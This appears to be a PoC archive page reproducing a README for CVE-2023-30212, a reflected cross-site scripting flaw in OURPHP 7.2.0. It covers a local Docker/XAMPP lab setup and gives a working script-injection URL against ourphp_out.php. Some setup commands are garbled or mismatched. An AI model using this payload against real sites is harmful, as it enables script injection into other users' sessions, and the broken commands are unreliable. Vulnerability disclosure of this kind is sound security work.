Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2023-30212 PoC — OURPHP 跨站脚本漏洞

Source
Associated Vulnerability
Title: OURPHP 跨站脚本漏洞 (CVE-2023-30212)
Description:OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.
Readme
# CVE-2023-30212
Exploiting vulnerability in Ourphp version 7.2.0 also called CVE 2023 30212



Step 1. Download and install Docker in your system
(Note). I am using Docker because it’s quick and easy to install ubuntu.



Step 2. Setup Docker environment 
    
    docker pull ubuntu
    docker run -d -t –name test-container -p 80:80 -p 443:44
    3 -p 3306:3306 -p 21:21 ubuntu
    Docker exec -it test-container bash


Step 3. Install web server, php & mysql. I will be installing xampp server for this.

    wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run 
    chmod +x xampp-linux-x64-7.2.0-0-installer.run
    ./xampp-linux-x64-7.2.0-0-installer.run
    /opt/lampp/lampp start



Step 4. Download Ourphp version 7.2.0

    wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
    unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
    chmod -R 775



Step 5. Setup Ourphp on browser
Open your browser and enter localhost or 127.0.0.1
Follow the instruction and install Ourphp.



Step 6. Exploiting the vulnerability 
Ourphp 7.2.0 version has a vulnerability to XSS (Cross-Site Scripting). 
To mitigate the vulnerability in the /client/manage/ourphp_out.php file that allows for the execution of XSS code, 

you need to modify the code. The vulnerability arises when the "ourphp_admin" parameter is set to "logout," and the controllable variable "out" is echoed. 


Attackers can exploit this by injecting a payload such as "</script><script>alert(xss)</script>".

    Code: http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>
![Screenshot 2023-05-29 135740](https://github.com/kai-iszz/CVE-2023-30212/assets/134775469/4c42fe02-6606-4db7-848c-91eae2e89d3e)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →